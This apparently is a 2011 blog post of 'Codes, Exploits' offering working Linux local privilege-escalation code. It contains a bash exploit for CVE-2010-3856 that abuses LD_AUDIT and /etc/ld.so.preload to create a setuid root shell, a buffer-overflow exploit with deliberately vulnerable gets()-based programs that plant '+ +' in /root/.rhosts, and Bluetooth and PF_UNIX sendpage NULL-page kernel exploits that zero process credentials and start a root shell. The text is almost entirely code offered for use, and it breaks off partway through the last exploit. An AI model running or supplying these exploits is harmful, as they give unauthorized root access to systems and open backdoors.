
Linux CVE-2010-3856 (Audit) – deadbyte version

Posted on 19th October 2011 in Codes, Exploits

Just thought it was worth posting…

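#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
#
# glibc's dynamic loader honoured LD_AUDIT for setuid binaries.  Loading
# libpcprofile.so that way runs its constructor inside the setuid ping; the
# constructor opens PCPROFILE_OUTPUT with root privileges and OUR umask, so
# with umask 0 it leaves behind a world-writable /etc/ld.so.preload.
#
#   1. Create the preload file through the audit hook and confirm that WE
#      can write it (not merely that it exists).
#   2. Build a small setuid shell wrapper plus a library whose getuid() hook
#      chowns/chmods that wrapper, list the library in ld.so.preload and run
#      the setuid ping again so it loads the hook.
#   3. Empty the preload file again (it cannot be unlinked from /etc by an
#      unprivileged user) and run the wrapper.

OUTPUT=/etc/ld.so.preload

MASK=$(umask)
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
# -w rather than -f: a pre-existing, root-owned preload file (an admin's)
# satisfies -f, and every later write to it would then fail silently.
if [ ! -w "$OUTPUT" ]; then
  echo "System does not appear to be vuln"
  umask "$MASK"
  exit 0
fi
echo -n > "$OUTPUT"
umask "$MASK"

# $PWD is pasted into C string literals below; refuse to build a broken or
# surprising library if it contains a quote or a backslash.
case "$PWD" in
  *'"'*|*'\'*)
    echo "working directory path cannot be embedded in a C string: $PWD" >&2
    exit 1 ;;
esac

cat > sh.c << 'EOF'
#include <unistd.h>
#include <stdio.h>

/* Setuid wrapper: make the effective (root) ids real, then exec bash. */
int main (int argc, char **argv, char **envp) {
    char *args[] = { "/bin/bash", NULL };
    if (setuid(geteuid()) != 0 || setgid(getegid()) != 0) {
        perror("setuid/setgid failed");
        return 1;
    }
    execve(args[0], args, envp);
    perror("execve failed");
    return 1;
}
EOF
gcc sh.c -o sh || { echo "failed to build sh" >&2; exit 1; }

cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>

/* Preloaded into the setuid ping (relies on ping calling getuid()): runs as
 * root and turns ./sh into a setuid-root binary.  chown first -- it clears
 * the setuid bit -- then chmod. */
uid_t getuid (void) {
    chown("$PWD/sh", 0, 0);
    chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
    return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c || { echo "failed to compile libpwn.c" >&2; exit 1; }
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o || { echo "failed to link libpwn.so" >&2; exit 1; }

echo "$PWD/libpwn.so" > "$OUTPUT"
ping 2> /dev/null
# Never leave our library in the global preload list, whatever happened.
echo -n > "$OUTPUT"
if [ ! -u ./sh ]; then
  echo "./sh did not become setuid; ping is probably not setuid root or the hook did not run" >&2
  exit 1
fi
./sh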

Have fun..

Linux tmpfile-rhosts() exploit Info/PoC Code (.c)

Posted on 18th October 2011 in Codes, Exploits

Here is a rather interesting exploit. Despite the name, it is not a bug in tmpfile(3): the vulnerable program overflows a static buffer into the adjacent filename pointer, and .rhosts is simply a convenient file to write. It is still not used much, but it could be constructed to work very easily through a netcat-like session; I won't go into that, but I will post the exploit
code, which is kind of like a small backdoor — you be the judge. It should probably be called the temp-rhosts bug, but it seems a bit trivial to exploit, so I'll leave the name up to you.

// MAIN exploit.c file..READ the notes as it shows you how
// to use this properly!! :?
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

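#define ERROR -1
#define BUFSIZE 16
/*
 * Run this vulprog as root or change the "vulfile" to something else.
 * Otherwise, even if the exploit works, it won't have permission to
 * overwrite /root/.rhosts (the default "example").
 *
 * DELIBERATELY VULNERABLE teaching program: gets() puts no bound on the line
 * read into the 16-byte static buf, and the static pointer declared right
 * after it (tmpfile) is expected to be laid out next to it, so the overflow
 * can redirect the write (see exploit1.c below).  Do not "fix" gets(),
 * reorder the declarations or change BUFSIZE: the exploit's DIFF constant
 * assumes this layout.
 *
 * Only change from the posted listing: the "\n" escapes the page had lost
 * from the format strings are restored.
 */
int main(int argc, char **argv) {
    FILE *tmpfd;
    static char buf[BUFSIZE], *tmpfile;
    if (argc <= 1) {
        /* argv[1] is never used here; the exploit passes the target path so
         * that it sits in argv, where the overwritten tmpfile can point. */
        fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
        exit(ERROR);
    }
    tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vul */
    printf("before: tmpfile = %s\n", tmpfile);
    printf("Enter one line of data to put in %s: ", tmpfile);
    gets(buf);                       /* the overflow: unbounded read into buf */
    printf("\nafter: tmpfile = %s\n", tmpfile);
    tmpfd = fopen(tmpfile, "w");
    if (tmpfd == NULL) {
        fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    fputs(buf, tmpfd);
    fclose(tmpfd);
    return 0;
}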

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

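#define ERROR -1
#define BUFSIZE 16

/*
 * vulprog1.c -- DELIBERATELY VULNERABLE teaching program (second copy of the
 * listing above).  gets() puts no bound on the line read into the 16-byte
 * static buf; the static pointer declared right after it (tmpfile) is
 * expected to be laid out next to it, so an overlong line redirects the
 * write to whatever address the attacker supplies.  Keep gets(), the
 * declaration order and BUFSIZE as they are: the exploit depends on them.
 *
 * Only change from the posted listing: the "\n" escapes the page had lost
 * from the format strings are restored.
 */
int main(int argc, char **argv) {
    FILE *tmpfd;
    static char buf[BUFSIZE], *tmpfile;
    if (argc <= 1) {
        /* argv[1] is unused; it exists so the exploit can park the target
         * filename in argv and point tmpfile at it. */
        fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
        exit(ERROR);
    }
    tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a tempfile vuln */
    printf("before: tmpfile = %s\n", tmpfile);
    printf("Enter one line of data to put in %s: ", tmpfile);
    gets(buf);                       /* the overflow: unbounded read into buf */
    printf("\nafter: tmpfile = %s\n", tmpfile);
    tmpfd = fopen(tmpfile, "w");
    if (tmpfd == NULL) {
        fprintf(stderr, "- error opening %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    fputs(buf, tmpfd);
    fclose(tmpfd);
    return 0;
}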

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
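/*
 * Return the caller's stack pointer.  The posted version relied on
 * "movl %esp,%eax" with no C return statement -- i.e. on eax happening to be
 * the return register and on the compiler not clobbering it -- which is
 * undefined behaviour that only works unoptimised on i386.  An asm output
 * operand makes it well-defined.  The exploit itself is i386-only (4-byte
 * u_long, DIFF tuned for a 32-bit vulprog); the 64-bit branch exists only
 * so the file still compiles there.
 */
u_long getesp(void) {
    u_long sp;
#if defined(__x86_64__)
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(sp));
#else
    __asm__ __volatile__("movl %%esp,%0" : "=r"(sp));
#endif
    return sp;
}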

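/*
 * Feed VULPROG one line that overflows its 16-byte static buf into the
 * adjacent tmpfile pointer, so the line is written to argv[1] (VULFILE).
 *
 * Line layout ("+ +\t# " is a valid .rhosts entry; '#' comments out the rest):
 *   "+ +\t# " | 'A' x DIFF | guessed argv[1] address, little-endian
 * with the address written at buf[DIFF..DIFF+3], i.e. over the last A's.
 *
 * i386 only: sizeof(u_long) must be 4 for the address to land inside buf and
 * to match the 32-bit vulprog's pointer width; on a 64-bit build we refuse
 * rather than overrun buf.  An address byte equal to 0, '\n' or '\'' cannot
 * survive the echo|gets pipeline -- try another <offset> in that case.
 *
 * Fixes against the posted listing: ERROR was never defined in this file,
 * the "\t"/"\n" escapes had been lost, and memset(mainbuf, 0, sizeof(mainbuf))
 * cleared only sizeof(char *) bytes.
 */
int main(int argc, char **argv) {
    u_long addr;
    size_t i;
    int mainbufsize;
    char *mainbuf, buf[DIFF + 6 + 1];
    const char *fmt = "echo '%s' | %s %s\n";

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    if (DIFF + sizeof(u_long) > sizeof(buf)) {
        fprintf(stderr, "this exploit assumes a 32-bit (i386) build\n");
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, sizeof(buf));
    strcpy(buf, "+ +\t# ");
    memset(buf + strlen(buf), 'A', DIFF);
    addr = getesp() + atoi(argv[1]);
    /* little-endian: least significant byte first */
    for (i = 0; i < sizeof(u_long); i++)
        buf[DIFF + i] = (char)((addr >> (i * 8)) & 255);

    /* size the command exactly instead of the old guessed "+ 13" */
    mainbufsize = snprintf(NULL, 0, fmt, buf, VULPROG, VULFILE) + 1;
    mainbuf = malloc(mainbufsize);
    if (mainbuf == NULL) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    memset(mainbuf, 0, mainbufsize);
    snprintf(mainbuf, mainbufsize, fmt, buf, VULPROG, VULFILE);
    printf("[+] Overflowing tmpaddr to point to %p, check %s after.\n\n",
           (void *)addr, VULFILE);
    system(mainbuf);
    free(mainbuf);
    return 0;
}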

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
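/*
 * Return the caller's stack pointer (used to guess where argv[1] of the
 * vulnerable program will sit).  The posted version executed
 * "movl %esp,%eax" and fell off the end of the function, relying on eax
 * being the return register -- undefined behaviour that happens to work at
 * -O0 on i386.  Using an asm output operand makes it well-defined.  The
 * exploit is i386-only; the 64-bit branch only keeps the file compiling.
 */
u_long getesp(void) {
    u_long sp;
#if defined(__x86_64__)
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(sp));
#else
    __asm__ __volatile__("movl %%esp,%0" : "=r"(sp));
#endif
    return sp;
}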

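/*
 * Second copy of exploit1.c's main().  Builds the overflow line
 *   "+ +\t# " | 'A' x DIFF | guessed argv[1] address (little-endian)
 * and pipes it into VULPROG with VULFILE as argv[1], so the overwritten
 * tmpfile pointer makes vulprog write the line to VULFILE.
 *
 * Fixes against the posted listing: the loop index was declared as "I" but
 * used as "i", ERROR is not defined in this file, the "\t"/"\n" escapes had
 * been lost, and memset(mainbuf, 0, sizeof(mainbuf)) only cleared a
 * pointer's worth of bytes.  i386 only: on a 64-bit build the 8-byte address
 * would overrun buf, so we refuse.  Address bytes equal to 0, '\n' or '\''
 * cannot survive the echo|gets pipeline -- try another <offset>.
 */
int main(int argc, char **argv) {
    u_long addr;
    size_t i;
    int mainbufsize;
    char *mainbuf, buf[DIFF + 6 + 1];
    const char *fmt = "echo '%s' | %s %s\n";

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    if (DIFF + sizeof(u_long) > sizeof(buf)) {
        fprintf(stderr, "this exploit assumes a 32-bit (i386) build\n");
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, sizeof(buf));
    strcpy(buf, "+ +\t# ");
    memset(buf + strlen(buf), 'A', DIFF);
    addr = getesp() + atoi(argv[1]);
    /* reverse byte order (on a little endian system) */
    for (i = 0; i < sizeof(u_long); i++)
        buf[DIFF + i] = (char)((addr >> (i * 8)) & 255);

    mainbufsize = snprintf(NULL, 0, fmt, buf, VULPROG, VULFILE) + 1;
    mainbuf = malloc(mainbufsize);
    if (mainbuf == NULL) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    memset(mainbuf, 0, mainbufsize);
    snprintf(mainbuf, mainbufsize, fmt, buf, VULPROG, VULFILE);
    printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
           (void *)addr, VULFILE);
    system(mainbuf);
    free(mainbuf);
    return 0;
}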

Enjoy!

PF_UNIX sendpage() 2010 — 2.6.18.el5-dev / 2.6.18-164.el5xen / 2.6.x (depends on the socket family existing). This is in three parts: PF_UNIX, PF_ECONET and PF_BLUETOOTH Linux working local root exploits (.c)

Posted on 13th October 2011 in Codes, Exploits

OK, two variants. Since someone at 1337shit.com leaked things they do not yet even know how to make the best use of, here are some gifts anyway — and one is special. Unfortunately it is going to be patched, or already is, depending on what else you do; but mmap() of the NULL page is the big trick, so remember the UNIX-socket problem too: the NULL page can be mapped, and the same approach is workable on BSD. Yes, it is patched there, but only in the latest FreeBSD update… nasty!

Code for the Bluetooth socket variant, with the mmap() part fixed — an old vulnerability which was never really leaked onto exploit sites like 1337shit.com (or whatever they call themselves — lamers, I call them).

/* Bluetooth Sendpage socket() local root exploit
 * Linux 2.6.18-128.el5
 * Linux 2.6.9-89.EL
 * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

/*
 * Read the stack pointer of the calling context.  Forced inline, presumably
 * so that when change_cred() runs in kernel context (via the page mapped at
 * 0) this reports the kernel stack pointer rather than a frame of its own.
 */
#if defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("mr %0,%%r1" : "=r"(value));   /* r1 is the stack pointer on PowerPC */
    return value;
}
#elif defined(__LP64__) && (defined(__i386__) || defined(__x86_64__))
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(value));
    return value;
}
#elif defined(__i386__) || defined(__x86_64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movl %%esp,%0" : "=r"(value));
    return value;
}
#endif
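#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Locate the current task_struct.  Only meaningful in kernel context -- it
 * is reached from change_cred() through the page mapped at 0; from user
 * space these reads fault or return garbage.
 *
 * x86_64: the pointer is taken from offset 0 of the per-CPU area addressed
 * by %gs (presumably the 'pcurrent' slot of the 2.6.18-era x8664_pda --
 * verify for the target kernel).
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    __asm__ __volatile__("movq %%gs:(0),%0" : "=r"(task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0

/*
 * i386: derive the task from the kernel stack pointer.  Three layouts are
 * probed in order and the first candidate whose first word equals
 * TASK_RUNNING is accepted (assumes 'state' is the first task_struct field):
 *   1. 4 KiB stack with thread_info at its base and thread_info->task at
 *      offset 0, trusted only if that word looks like a kernel address
 *      (>= 0xc0000000, the default 3G/1G split);
 *   2. 8 KiB stack with task_struct itself at the base;
 *   3. 8 KiB stack with thread_info at the base.
 * Returns (unsigned long)-1 if nothing matched, in which case change_cred()
 * starts its scan from an invalid address.
 *
 * The posted listing had an en dash in "4096 – 1" / "8192 – 1" (a web
 * rendering artefact) and did not compile; only that is changed here.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

/*
 * PowerPC: the kernel stack is assumed 16 KiB-aligned (64-bit) or
 * 8 KiB-aligned (32-bit).  The base is tried first as the task_struct
 * itself, then as a thread_info whose first word points to the task; a
 * candidate is accepted when its first word equals TASK_RUNNING.
 * Returns (unsigned long)-1 if neither matched.  Same en-dash repair as above.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif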
#if defined(__i386__) || defined(__x86_64__)
/* Real uid/gid of this process, filled in by main(); the credential block
 * inside task_struct is recognised by finding these values. */
static unsigned long uid, gid;

/* True when the eight 32-bit words at w read uid,uid,uid,uid,gid,gid,gid,gid
 * (presumably uid/euid/suid/fsuid then gid/egid/sgid/fsgid in the target
 * kernel's task_struct -- verify against the target layout). */
static inline int is_cred_block(const unsigned int *w) {
    int k;
    for (k = 0; k < 4; k++)
        if (w[k] != uid)
            return 0;
    for (k = 4; k < 8; k++)
        if (w[k] != gid)
            return 0;
    return 1;
}

/*
 * Runs in kernel context, reached through the page mapped at 0.  Scans
 * upward from the current task_struct for the credential block and zeroes
 * it, making every id root.  Always returns -1; there is no "not found"
 * exit -- if the pattern never appears the scan presumably runs off the end
 * of mapped memory and the kernel faults.
 */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
/* The PowerPC variant has no uid/gid to compare with: the first run of four
 * equal non-zero words followed by four equal words is taken to be the
 * credential block, which can false-positive on other data. */
static inline int is_cred_block(const unsigned int *w) {
    if (w[0] == 0)
        return 0;
    return w[0] == w[1] && w[0] == w[2] && w[0] == w[3]
        && w[4] == w[5] && w[4] == w[6] && w[4] == w[7];
}

/* Same contract as the x86 version: zero the first matching block, return -1. */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#endif
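#define PAGE_SIZE getpagesize()  /* use this in 2011! (xd) */

/*
 * Map the zero page, plant a trampoline to change_cred() at address 0 and
 * trigger sock_sendpage() on a PF_BLUETOOTH datagram socket whose proto_ops
 * (on the listed kernels) has no sendpage, so the kernel calls NULL and runs
 * our page with kernel privileges; change_cred() then zeroes the task's ids.
 *
 * Mapping page 0 must be permitted (vm.mmap_min_addr and, where present,
 * the SELinux mmap_zero check); the mmap() failure path reports that.
 *
 * Fixes against the posted listing: "0×0" and the curly quotes around the
 * byte literals were web artefacts that did not compile; the mkstemp()
 * template must end in six X's ("tmp.XX" fails with EINVAL before anything
 * is attempted); the ppc32 branch truncated the pointer to 16 bits before
 * shifting, so the high half of the jump target was always 0; and the shell
 * is only started once we really are root.
 */
int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XXXXXX";
    unsigned long target;
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    addr = mmap(NULL, PAGE_SIZE, PROT_EXEC | PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    if (addr == MAP_FAILED) {
        perror("- mmap failed (page 0 not mappable?)");
        exit(EXIT_FAILURE);
    }
    target = (unsigned long)change_cred;
#if defined(__i386__) || defined(__x86_64__)
    {
        unsigned int disp = 8;   /* absolute address of the slot holding &change_cred */
#if defined(__LP64__)
        /* ff 24 25 disp32: jmp *disp32 (SIB form, no base/index register) */
        addr[0] = '\xff';
        addr[1] = '\x24';
        addr[2] = '\x25';
        memcpy(&addr[3], &disp, sizeof disp);
#else
        /* ff 25 disp32: jmp *disp32 */
        addr[0] = '\xff';
        addr[1] = '\x25';
        memcpy(&addr[2], &disp, sizeof disp);
#endif
        /* The page is zero-filled by mmap, so the bytes between the
         * displacement and the slot at 8 are 0, exactly as the original
         * pointer-sized stores left them. */
        memcpy(&addr[8], &target, sizeof target);
    }
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    /* ppc64: an indirect call goes through a function descriptor, so page 0
     * is turned into one whose entry word is change_cred's entry address
     * (the first word of change_cred's own descriptor) -- presumably the
     * ELFv1 ABI; verify on real hardware. */
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    /* lis r31,hi16 ; ori r31,r31,lo16 ; mtctr r31 ; bctr */
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)(target >> 16);
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)(target & 0xffff);
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
        perror("- socket");
        exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
        perror("- mkstemp");
        exit(EXIT_FAILURE);
    }
    if (unlink(template) == -1) {
        perror("- unlink");
        exit(EXIT_FAILURE);
    }
    /* sendfile() needs at least a page of input to hand to sendpage() */
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
        perror("- ftruncate");
        exit(EXIT_FAILURE);
    }
    /* On a vulnerable kernel the NULL sendpage lands in change_cred(), whose
     * -1 return value propagates back out of the kernel, so sendfile()
     * reports an error in the success case too.  Our ids are the only
     * reliable signal. */
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    if (getuid() != 0) {
        fprintf(stderr, "- still uid %lu: kernel not vulnerable or credentials not found\n",
                (unsigned long)getuid());
        exit(EXIT_FAILURE);
    }
    execl("/bin/sh", "sh", "-i", NULL);
    perror("- execl");
    exit(EXIT_FAILURE);
}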

Code for PF_UNIX sendpage() socketx (my version):

/* UNIX socket() local root exploit (OS Portable version)
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

/*
 * Read the stack pointer of the calling context.  Forced inline, presumably
 * so that when change_cred() runs in kernel context (via the page mapped at
 * 0) this reports the kernel stack pointer rather than a frame of its own.
 */
#if defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("mr %0,%%r1" : "=r"(value));   /* r1 is the stack pointer on PowerPC */
    return value;
}
#elif defined(__LP64__) && (defined(__i386__) || defined(__x86_64__))
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(value));
    return value;
}
#elif defined(__i386__) || defined(__x86_64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movl %%esp,%0" : "=r"(value));
    return value;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Locate the current task_struct.  Only meaningful in kernel context -- it
 * is reached from change_cred() through the page mapped at 0; from user
 * space these reads fault or return garbage.
 *
 * x86_64: the pointer is taken from offset 0 of the per-CPU area addressed
 * by %gs (presumably the 'pcurrent' slot of the 2.6.18-era x8664_pda --
 * verify for the target kernel).
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
/*
 * i386: derive the task from the kernel stack pointer.  Three layouts are
 * probed in order and the first candidate whose first word equals
 * TASK_RUNNING is accepted (assumes 'state' is the first task_struct field):
 *   1. 4 KiB stack with thread_info at its base and thread_info->task at
 *      offset 0, trusted only if that word looks like a kernel address
 *      (>= 0xc0000000, the default 3G/1G split);
 *   2. 8 KiB stack with task_struct itself at the base;
 *   3. 8 KiB stack with thread_info at the base.
 * Returns (unsigned long)-1 if nothing matched, in which case change_cred()
 * starts its scan from an invalid address.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

/*
 * PowerPC: the kernel stack is assumed 16 KiB-aligned (64-bit) or
 * 8 KiB-aligned (32-bit).  The base is tried first as the task_struct
 * itself, then as a thread_info whose first word points to the task; a
 * candidate is accepted when its first word equals TASK_RUNNING.
 * Returns (unsigned long)-1 if neither matched.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
/* Real uid/gid of this process, filled in by main(); the credential block
 * inside task_struct is recognised by finding these values. */
static unsigned long uid, gid;

/* True when the eight 32-bit words at w read uid,uid,uid,uid,gid,gid,gid,gid
 * (presumably uid/euid/suid/fsuid then gid/egid/sgid/fsgid in the target
 * kernel's task_struct -- verify against the target layout). */
static inline int is_cred_block(const unsigned int *w) {
    int k;
    for (k = 0; k < 4; k++)
        if (w[k] != uid)
            return 0;
    for (k = 4; k < 8; k++)
        if (w[k] != gid)
            return 0;
    return 1;
}

/*
 * Runs in kernel context, reached through the page mapped at 0.  Scans
 * upward from the current task_struct for the credential block and zeroes
 * it, making every id root.  Always returns -1; there is no "not found"
 * exit -- if the pattern never appears the scan presumably runs off the end
 * of mapped memory and the kernel faults.
 */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
/* The PowerPC variant has no uid/gid to compare with: the first run of four
 * equal non-zero words followed by four equal words is taken to be the
 * credential block, which can false-positive on other data. */
static inline int is_cred_block(const unsigned int *w) {
    if (w[0] == 0)
        return 0;
    return w[0] == w[1] && w[0] == w[2] && w[0] == w[3]
        && w[4] == w[5] && w[4] == w[6] && w[4] == w[7];
}

/* Same contract as the x86 version: zero the first matching block, return -1. */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#endif
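#define PAGE_SIZE getpagesize()

/*
 * Map the zero page, plant a trampoline to change_cred() at address 0 and
 * trigger sock_sendpage() on a PF_UNIX datagram socket whose proto_ops has
 * no sendpage, so the kernel calls NULL and runs our page with kernel
 * privileges; change_cred() then zeroes the task's ids.
 *
 * Mapping page 0 must be permitted (vm.mmap_min_addr and, where present,
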